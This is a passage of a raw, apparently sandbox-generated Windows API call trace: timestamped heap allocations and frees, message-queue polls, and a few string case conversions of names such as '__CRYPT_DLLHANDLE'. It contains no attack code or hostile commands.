returned 0x2e78a50 [0268.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.630] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.631] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.631] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.631] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0268.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.632] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0268.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.633] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.633] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0268.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0268.633] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0268.633] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0268.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0268.634] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0268.634] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0268.634] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0268.634] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.634] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0268.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.634] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0268.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0268.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0268.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0268.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0268.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0268.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0268.640] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518f8 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0268.640] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0268.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0268.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0268.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4dbb) returned 0x2f24970 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24970 | out: hHeap=0x970000) returned 1 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 